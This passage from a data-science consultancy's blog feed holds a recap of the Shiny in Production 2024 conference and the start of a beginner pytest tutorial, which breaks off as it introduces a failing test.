padding-top: 2em;
column-gap: 0.25em;
row-gap: 1em;
justify-content: center;
flex-wrap: wrap;
}
[id="speaker-images"] picture {
display: contents;
}
[id="speaker-images"] img {
flex: 1 0 200px;
min-width: 200px;
max-width: 350px;
}
&lt;/style&gt;
&lt;p&gt;Hot on the heels of Shiny in Production 2022 &amp;amp; 2023, we were excited to dive back into all things Shiny for a third consecutive year. In this post we recap the highlights from the two days of talks and workshops.&lt;/p&gt;
&lt;h2 id="workshops"&gt;Workshops&lt;/h2&gt;
&lt;p&gt;As with previous iterations of the conference, we began on Day 1 with an afternoon of insightful workshops:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Level up your plots: Tips, tricks and resources for crafting compelling visualisations with R and ggplot2:&lt;/strong&gt; Following her stand-out talk at Shiny in Production 2023, we were delighted to welcome back Cara Thompson for both a talk AND a workshop this year! Cara&amp;rsquo;s hands-on workshop offered attendees a chance to craft appealing and informative visualisations of their data without compromising on accessibility.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Building Responsive Shiny Applications:&lt;/strong&gt; Our very own Shiny expert, Pedro Silva, shared some responsive design principles and best practices for Shiny developers to build fluid web pages that run on various screen sizes from desktops to mobile devices.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Asynchronous Shiny:&lt;/strong&gt; Our data scientist and trainer, Russ Hyde, introduced the idea of asynchronous programming, providing attendees with the basics to solve between-session and within-session blocking in a Shiny app.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Building Apps for Humans:&lt;/strong&gt; Osheen MacOscar (another JR data scientist!) explored the basics of human-computer interaction and outlined how layout, colour, size and motion in a Shiny interface can be used to enhance the user experience.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Noticing a trend here? At Jumping Rivers we offer training and upskilling in all things Shiny! If you&amp;rsquo;re keen to learn more about Shiny (or data science more generally) check out our full list of available training courses &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-shiny-in-production-highlights"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;figure id="speaker-images"&gt;
&lt;picture&gt;
&lt;source srcset="main-talks.webp 1x, main-talks@2x.webp 2x" type="image/webp"&gt;
&lt;img src="main-talks.jpg" alt="Photo of all main speakers"/&gt;
&lt;/picture&gt;
&lt;picture&gt;
&lt;source srcset="lightning-talks.webp 1x, lightning-talks@2x.webp 2x" type="image/webp"&gt;
&lt;img src="lightning-talks.jpg" alt="Photo of all lightning-talk speakers"/&gt;
&lt;/picture&gt;
&lt;/figure&gt;
&lt;h2 id="talks"&gt;Talks&lt;/h2&gt;
&lt;p&gt;On Day 2 we enjoyed talks from some fabulous speakers across a range of industries!&lt;/p&gt;
&lt;h3 id="keynote-cara-thompson-data-visualisation-consultant"&gt;Keynote: &lt;a href="https://www.cararthompson.com/" rel="external"&gt;Cara Thompson&lt;/a&gt; (Data visualisation consultant)&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Data-To-Wow: Leveraging Shiny as a no-code solution for high-end parameterised visualisations&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The vast majority of data visualisations start from the data, and while you may not know exactly how the final image will look at the start, you can tweak and refine your way to a result that looks good.
But Cara had a slightly different challenge: take an existing data visualisation the client has designed, and recreate it in {ggplot2} so the plots can be quickly generated from any future data.&lt;/p&gt;
&lt;p&gt;Cara guided us through how she tackled some of the challenges encountered along the way, such as creating your own {ggplot2} geom in order to draw straight lines between points when the plot uses polar coordinates.
There were also lessons in why we shouldn&amp;rsquo;t always rely on a single numerical summary like the mean in a plot, when the raw data has the potential to show us patterns we&amp;rsquo;d ordinarily lose.&lt;/p&gt;
&lt;p&gt;But in order to be useful for the client, all this hard work needs to be easy to use.
And when the client has no prior experience with running R code or using an &lt;abbr title="Integrated development environment"&gt;IDE&lt;/abbr&gt; like RStudio, Shiny becomes a valuable tool for allowing anyone to run R code, without needing to know how to run the R code.
To make it as easy as possible to run the Shiny application, Cara provided her client with a desktop shortcut: clicking on it automatically launches the Shiny application in a background R process and displays the app in a web browser as normal.
The net result is that the client can run the Shiny app locally on their computer, just like they would any other software application.&lt;/p&gt;
&lt;h3 id="pedro-silva-jumping-rivers"&gt;&lt;a href="https://pedrocsilva.com/" rel="external"&gt;Pedro Silva&lt;/a&gt; (Jumping Rivers)&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Convincing IT that R packages are safe&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;When IT departments are responsible for ensuring the security and integrity of the systems they manage, it&amp;rsquo;s understandable that IT managers will be reluctant to install software if they can avoid it.
Combine this with the nature of open-source software often being maintained by thousands of volunteers&amp;mdash;with some operating entirely under online pseudonyms&amp;mdash;and they can also start to view some software with great scepticism.
The issue becomes even more serious when you work in a heavily regulated industry&amp;mdash;such as banking, pharmaceuticals or critical national infrastructure&amp;mdash;where the systems could be scrutinised in an audit or the consequences of a compromised system can be severe.&lt;/p&gt;
&lt;p&gt;Pedro provided an insight into the need to validate R packages, and the solutions Jumping Rivers is currently working on with organisations in industry.
The aim is to provide information that summarises the risk of using any R package on &lt;abbr title="The Comprehensive R Archive Network"&gt;CRAN&lt;/abbr&gt; based on the quality of its development.
Users can specify additional and stricter test criteria for what should be checked, and weight the criteria so that some have a greater influence on the final risk summary scores.&lt;/p&gt;
&lt;p&gt;With this information, organisations will be able to determine if the package they want to use is safe enough to use.
Where packages are identified to carry too much risk, they can invest time in fixing the issues in the weakest areas of the package, such as increasing test coverage on some of the package methods.&lt;/p&gt;
&lt;p&gt;Pedro rounded off the talk by demonstrating the use of Quarto to generate summary reports and a Shiny dashboard that allows users to explore breakdowns of validation scores from different packages.&lt;/p&gt;
&lt;h3 id="vikki-richardson-audit-scotland"&gt;&lt;a href="https://www.linkedin.com/in/vikkirichardsondata/" rel="external"&gt;Vikki Richardson&lt;/a&gt; (Audit Scotland)&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Faster than a Speeding Arrow - R Shiny Optimisation In Practice&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;When the size of your data is large enough to cause considerable loading times, it&amp;rsquo;s time to start optimising how your data is handled.
Vikki talked us through how her team went about cutting their application loading times.&lt;/p&gt;
&lt;p&gt;There are many strategies for trying to make a more performant application.
The most obvious is to throw more compute resources at the problem; have more instances of the application run so concurrent users each get a faster experience.
But it doesn&amp;rsquo;t necessarily solve the underlying issue, it inflates your compute costs, and as a solution, it lacks a certain elegance.&lt;/p&gt;
&lt;p&gt;Data caching with the {memoise} package can provide a great speed-up, but with Apache Arrow there were further gains to be found.
Vikki explained how the team was able to interface with Apache Arrow commands using {dplyr} syntax, and highlighted some of the drawbacks of this method, such as certain {dplyr} verbs not being supported by Apache Arrow.
The end result was certainly impressive: the combination of caching and Apache Arrow saw data processing times slashed from several minutes to under 2 seconds.&lt;/p&gt;
&lt;h3 id="gareth-burns-exploristics"&gt;&lt;a href="https://www.linkedin.com/in/drgarethburns/" rel="external"&gt;Gareth Burns&lt;/a&gt; (Exploristics)&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Shiny in Secondary Education: Supplementing traditional learning resources to allow students to explore statistical concepts&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Gareth describes this project as &amp;ldquo;a passion project that wouldn&amp;rsquo;t have been successful without Shiny&amp;rdquo;.
It all started with a call to action by Steve Mallett, which led Gareth to volunteer his time to develop a Shiny application for &lt;a href="https://psiweb.org/careers/outreach/schools-outreach" rel="external"&gt;science communication in secondary schools&lt;/a&gt; that makes learning fun, engaging and interactive.&lt;/p&gt;
&lt;p&gt;The app addressed a number of issues with how the existing workshops were performed, such as removing the need for most physical materials to be sent to different locations.
There were valuable lessons along the way too, such as the importance of making your application robust to the mischievous minds of secondary-level students who will find creative ways to break your work, and ensuring your data visualisations will be understandable to your target audience.
Gareth also shared ideas for minimising potential human data-input errors by having the data captured within the application itself.&lt;/p&gt;
&lt;p&gt;The live demonstration of the Shiny application showcased some well-designed custom-made widgets and modules, crafted using self-made &lt;abbr title="Hyper-text markup language"&gt;HTML&lt;/abbr&gt;, &lt;abbr title="Cascading style sheets"&gt;CSS&lt;/abbr&gt; and JavaScript. Gareth also offered inspiration for making the application more engaging to young students by gamifying the activity. The slides can be found &lt;a href="https://rpubs.com/garethburns/ShinyinSecondaryEducation" rel="external"&gt;here&lt;/a&gt; and the (messy) code is on &lt;a href="https://github.com/GABurns/Presentations/tree/master/Shiny%20in%20Production" rel="external"&gt;GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="tan-ho-zelus-analytics"&gt;&lt;a href="https://twitter.com/_TanHo" rel="external"&gt;Tan Ho&lt;/a&gt; (Zelus Analytics)&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;A minimum viable Shiny infrastructure for serving 95,000 monthly users&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;How do you support many &amp;ndash; many &amp;ndash; users of a Shiny app? Tan took us through
the lifetime of the &lt;a href="https://dynastyprocess.com/" rel="external"&gt;DynastyProcess&lt;/a&gt; Fantasy Football app.
This was originally built by Tan and his friend
Joe Sydlowski. Neither of them had made a Shiny app before, and Tan had never
written any R, yet within 2 years of running they had 200,000
unique users per month. Tan presented a series of top tips to ensure that your
app keeps running, grows with its audience, and gets you that data science job
that you dreamed of: 1) try running your own Shiny Server, as this cheap option could
help you scale up your app when you need to; 2) don’t do too much inside your app,
and push as much data processing outside of it as possible;
3) log everything; and 4) listen to your users. But most importantly, start from where
you are because “there’s always much to learn”.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;a href="https://github.com/tanho63/talk_shinyprod2024_scaling" rel="external"&gt;Talk materials available here&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;h3 id="katy-morgan-government-internal-audit-agency"&gt;&lt;a href="https://www.linkedin.com/company/giaa/" rel="external"&gt;Katy Morgan&lt;/a&gt; (Government Internal Audit Agency)&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;More than just a chat bot: Tailoring the use of Generative AI within Government Internal Audit Agency with user-friendly R shiny applications&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Katy presented an insight into three Shiny apps that are used when conducting
government audits. These are used at different stages of the audit process and
make use of ChatGPT. For example, when thinking about the risks within a
project, what are the possible causes, events associated with, and consequences
of those risks? A series of predefined ChatGPT prompts are used to suggest text
that expert auditors can make use of within their workflow. The apps are
deployed on Azure App Service and make use of the {golem} framework and Docker to
simplify development, deployment and authentication.&lt;/p&gt;
&lt;h3 id="lightning-talks"&gt;Lightning Talks&lt;/h3&gt;
&lt;p&gt;This year also featured a segment for lightning talks with a twist: all speakers would be presenting from auto-scrolling slides which would change every 20 seconds! This turned out to be much less dramatic than anticipated, with our lightning speakers all staying perfectly on time&amp;hellip;&lt;/p&gt;
&lt;p&gt;Here&amp;rsquo;s a brief synopsis of each talk.&lt;/p&gt;
&lt;h4 id="the-sk8-project-a-scalable-institutional-architecture-for-managing-and-hosting-shiny-applications"&gt;The SK8 Project: A scalable institutional architecture for managing and hosting Shiny applications&lt;/h4&gt;
&lt;p&gt;David Carayon (INRAE) started his talk by noting that, while Shiny is a great tool for building web apps, it&amp;rsquo;s not always easy to share these with colleagues. In particular, paid solutions such as Posit and AWS are not always feasible for Shiny users. Enter SK8, which offers a cost-effective solution for deploying Shiny apps to the web using Kubernetes. The deployment process involves an automated CI/CD pipeline which unpacks the app dependencies and creates a Dockerfile which is deployed by Kubernetes to the web. In the space of just a few years, the service has grown to 100 deployed applications! The talk materials can be found &lt;a href="https://hal.inrae.fr/hal-04735290" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="monitoring-and-improving-posit-workbench-usage-behaviour-at-public-health-scotland"&gt;Monitoring and improving Posit Workbench usage behaviour at Public Health Scotland&lt;/h4&gt;
&lt;p&gt;At PHS there are over 450 active users of Posit. Alasdair Morgan showed us how he has been reporting the Posit Workbench usage habits with the aim of keeping costs down by avoiding wastage of the allocated resources. User activity is tracked by Azure logs and reported using R Markdown. These reports include hard-hitting visualisations of the proportion of allocated memory and CPUs that are actually being used. Remembering that this was a Shiny conference, Alasdair showed us a dashboard highlighting some of the worst offenders! (anonymised of course&amp;hellip;)&lt;/p&gt;
&lt;p&gt;Alasdair&amp;rsquo;s light-hearted examination of the user habits at PHS went down very well with our audience and went on to take the prize for best lightning talk!&lt;/p&gt;
&lt;h4 id="using-google-lighthouse-to-analyse-shiny-applications"&gt;Using Google Lighthouse to analyse Shiny Applications&lt;/h4&gt;
&lt;p&gt;Fresh from his workshop the day before, Osheen MacOscar introduced us to Google Lighthouse, an open source tool for assessing various metrics of web-based apps including load speed, interactivity and accessibility. Selecting 134 Shiny apps from &lt;a href="https://www.appsilon.com/" rel="external"&gt;Appsilon&lt;/a&gt;, Osheen showed that only 40 apps were listed as having &amp;ldquo;good&amp;rdquo; performance. Osheen went on to show that as complexity is added (such as interactive plots and widgets) performance can decrease due to slower load times. However, this is not always a bad thing since widgets can also improve the user experience. In summary, Lighthouse is a great tool for assessing apps but we shouldn&amp;rsquo;t let it stop us from adding (useful) complexity to our apps.&lt;/p&gt;
&lt;h4 id="risk-assessment-as-a-service-project-roll-out"&gt;Risk Assessment as a Service (Project Roll-out)&lt;/h4&gt;
&lt;p&gt;Another of our data scientists, Astrid Radermacher, discussed the importance of risk assessment in various industries and our efforts at JR to roll out package validation as an automated service. Our process involves assessing the package (checking if it is secure and well maintained) and generating a report. If the package passes our checks, it can be included in the client&amp;rsquo;s regulated environment. Otherwise we can offer manual remediation. Having largely focused on package assessment, our next steps will be on improving package remediation and scaling the automated service to different user operating systems. We look forward to onboarding additional clients with the service in early 2025 and releasing to open source in the longer term.&lt;/p&gt;
&lt;h4 id="chagas-diagnostic-algorithms-an-online-application-to-estimate-cost-and-effectiveness-of-diagnostic-algorithms-for-chagas-disease"&gt;Chagas Diagnostic Algorithms: an online application to estimate cost and effectiveness of diagnostic algorithms for Chagas disease&lt;/h4&gt;
&lt;p&gt;Juan Vallarta (FIND) began by outlining the challenges in diagnosing Chagas disease (a global disease which is particularly prevalent in Latin America). Diagnosis is often financially and logistically challenging and can either be conducted in a lab setting or more rapidly onsite. He then presented an &lt;a href="https://finddx.shinyapps.io/chagaspathway" rel="external"&gt;online tool&lt;/a&gt; for estimating the cost and effectiveness of different diagnostic algorithms, taking into account the sensitivity and specificity of each test. The results can be viewed in a user interface and downloaded as an HTML report. The app has been deployed globally not just for Chagas, but also for other diseases including COVID-19 and mpox.&lt;/p&gt;
&lt;h4 id="rainbowr"&gt;&lt;a href="https://rainbowr.org/" rel="external"&gt;rainbowR&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Our final lightning talk was given by Ella Kaye (University of Warwick) who spoke about &lt;a href="https://rainbowr.org/" rel="external"&gt;rainbowR&lt;/a&gt;, which aims to connect, support and promote LGBTQ+ users within the R community. Since 2017 the rainbowR community has grown to over 130 members and runs monthly meetups. The community also manages a social data project (&lt;a href="https://github.com/r-lgbtq/tidyrainbow" rel="external"&gt;tidyRainbow&lt;/a&gt;) which collates LGBTQ+ datasets. To find out how to join and contribute, check out &lt;a href="https://rainbowr.org/" rel="external"&gt;rainbowr.org/&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="what-happens-next"&gt;What happens next?&lt;/h2&gt;
&lt;p&gt;We want to say thank you to the sponsors of the event for your support in making it possible!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.nicd.org.uk/" rel="external"&gt;National Innovation Centre for Data&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://rss.org.uk/" rel="external"&gt;Royal Statistical Society&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.ncl.ac.uk/maths-physics/engagement/nusolve/" rel="external"&gt;NU Solve&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.r-consortium.org/" rel="external"&gt;R Consortium&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Thanks also to our speakers and attendees who travelled from near and far to make it another memorable conference! Check out our &lt;a href="https://youtube.com/@jumping-rivers?si=Cwfi0bgbgFJaXnbq" rel="external"&gt;YouTube channel&lt;/a&gt; where the talk recordings will be released in the coming weeks!&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re already planning on running Shiny in Production again! The 2025 edition will run on the 8th &amp;amp; 9th of October and you can already grab your super early bird tickets &lt;a href="https://www.eventbrite.co.uk/e/shiny-in-production-2025-registration-1035155587227" rel="external"&gt;here&lt;/a&gt;. We can&amp;rsquo;t wait to share more details with you soon!&lt;/p&gt;
&lt;h2 id="sponsors"&gt;Sponsors&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.nicd.org.uk/"&gt;&lt;img src="nicd_logo.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="NICD logo" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.r-consortium.org/"&gt;&lt;img src="rconsortium-logo.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="R Consortium logo" /&gt;&lt;/a&gt;
&lt;br&gt;
&lt;a href="https://rss.org.uk/"&gt;&lt;img src="rss_logo.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto; margin-top: 1em" alt="RSS logo" /&gt;&lt;/a&gt;
&lt;br&gt;
&lt;a href="https://www.routledge.com/"&gt;&lt;img src="crc-press-logo.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto; margin-top: 1em" alt="CRC Press logo" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-highlights-2024/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>First Steps in Python Testing</title><link>https://www.jumpingrivers.com/blog/intro-to-pytest/</link><pubDate>Thu, 05 Sep 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/intro-to-pytest/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/intro-to-pytest/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/intro-to-pytest/featured.svg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Programming is a craft, and in data science we often spend countless hours coding. There isn&amp;rsquo;t a
magic shortcut to improving your programming skills. But, like any craft, improvement comes from
practice: challenging yourself, exploring related skills, learning from others, and teaching.&lt;/p&gt;
&lt;p&gt;Testing code using automated tools is common throughout the software development industry. This
technique can improve the quality of the code you write as a data scientist. Testing helps refine
your code, supports redesign, prevents errors, and makes it harder to write single-use code.&lt;/p&gt;
&lt;p&gt;Here, we introduce the pytest framework and show how it can be used to test Python functions. If you
don&amp;rsquo;t use a testing framework as part of your daily workflow, try experimenting with the techniques
presented here the next time you write or extend a function.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-intro-to-pytest"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="about-pytest"&gt;About pytest&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://docs.pytest.org/en/stable/" rel="external"&gt;pytest&lt;/a&gt; is a software testing framework. It is a command-line
tool that automatically finds the tests you’ve written, runs them, and reports the results.
pytest is known for its simplicity, scalability, and powerful features such as fixture
support and parametrization. Compared to the testing tools in the Python standard library, it has a
more concise syntax and a rich plugin ecosystem.&lt;/p&gt;
&lt;h3 id="getting-started-with-pytest"&gt;Getting started with pytest&lt;/h3&gt;
&lt;p&gt;Before we start writing tests, it&amp;rsquo;s important to set up a clean, isolated environment where we can
install and manage packages.
This is done using a virtual environment.&lt;/p&gt;
&lt;p&gt;We first navigate to the project directory and create a virtual environment for our project (first line below).
We then activate the virtual environment (second line) and install pytest (third line).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$ python3 -m venv venv
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$ source venv/bin/activate
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;venv&lt;span style="color:#ff7b72;font-weight:bold"&gt;)&lt;/span&gt; $ pip install pytest
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We have everything set up to use pytest in our project.
When we are done working in the virtual environment, we can deactivate it by simply running:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$ deactivate
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now that your environment is set up, let&amp;rsquo;s explore the basics of pytest.&lt;/p&gt;
&lt;h3 id="what-is-a-test"&gt;What is a test?&lt;/h3&gt;
&lt;p&gt;A test is a small piece of code (usually a function) that checks whether another piece of code is
working as expected.
For example, imagine you wrote a function to calculate the mean of a list of numbers. A test would
check if the function correctly computes the mean for different inputs.&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s create a simple function that calculates the mean of a list of numbers &lt;code&gt;x&lt;/code&gt; and save it in &lt;code&gt;my_functions.py&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./my_functions.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;calculate_mean&lt;/span&gt;(x):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; sum(x) &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; len(x)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A very nice property of pytest is something called &lt;em&gt;test discovery&lt;/em&gt;, a series of naming conventions
that tell pytest how to go and search for tests and execute them.
Any file that contains test functions should have a name that starts with &lt;code&gt;test_&lt;/code&gt;, and the test functions in this
file should be named in the same way.
Then, pytest will automatically search and find these functions and run them.&lt;/p&gt;
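&lt;p&gt;As a rough illustration of these naming rules, the sketch below mimics pytest&amp;rsquo;s default patterns (files matching &lt;code&gt;test_*.py&lt;/code&gt; or &lt;code&gt;*_test.py&lt;/code&gt;, and functions whose names start with &lt;code&gt;test&lt;/code&gt;). The helper names are hypothetical and this is not how pytest implements discovery; it only shows which names would be picked up under the default settings.&lt;/p&gt;

```python
from fnmatch import fnmatch

# Default file name patterns used by pytest unless overridden in its configuration.
DEFAULT_FILE_PATTERNS = ("test_*.py", "*_test.py")


def looks_like_test_file(filename):
    """Return True if the file name matches one of the default patterns."""
    return any(fnmatch(filename, pattern) for pattern in DEFAULT_FILE_PATTERNS)


def looks_like_test_function(name):
    """Return True if the function name carries the default 'test' prefix."""
    return name.startswith("test")


print(looks_like_test_file("test_my_functions.py"))   # True
print(looks_like_test_file("my_functions.py"))        # False
print(looks_like_test_function("test_calculate_mean"))  # True
```

&lt;p&gt;Under these rules &lt;code&gt;my_functions.py&lt;/code&gt; is ignored during collection, while &lt;code&gt;test_my_functions.py&lt;/code&gt; and the &lt;code&gt;test_&lt;/code&gt;-prefixed functions inside it are collected.&lt;/p&gt;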
&lt;p&gt;Now, let us write a test for this function using pytest.
Create a file named &lt;code&gt;test_my_functions.py&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./test_my_functions.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;my_functions&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; calculate_mean
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_calculate_mean&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; result &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; calculate_mean(x)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; expected &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;assert&lt;/span&gt; result &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; expected
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In this example, &lt;code&gt;test_calculate_mean()&lt;/code&gt; is a test function.
It checks if &lt;code&gt;calculate_mean([1, 2, 3, 4, 5])&lt;/code&gt; returns &lt;code&gt;3.0&lt;/code&gt;.
When we run pytest, it will check if the &lt;code&gt;assert&lt;/code&gt; statement holds true.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$ pytest test_my_functions.py
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=============================&lt;/span&gt; test session &lt;span style="color:#79c0ff"&gt;starts&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==============================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_my_functions.py . &lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;100%&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;==============================&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; passed in 0.01s &lt;span style="color:#ff7b72;font-weight:bold"&gt;===============================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can see that the test has successfully passed. In the output, the dot (&lt;code&gt;.&lt;/code&gt;) after
&lt;code&gt;test_my_functions.py&lt;/code&gt; indicates that the test has passed.&lt;/p&gt;
&lt;p&gt;Now, let&amp;rsquo;s have a look at an example of a failing test.
Consider the following test function which is in the file &lt;code&gt;test_failing.py&lt;/code&gt;.&lt;/p&gt;
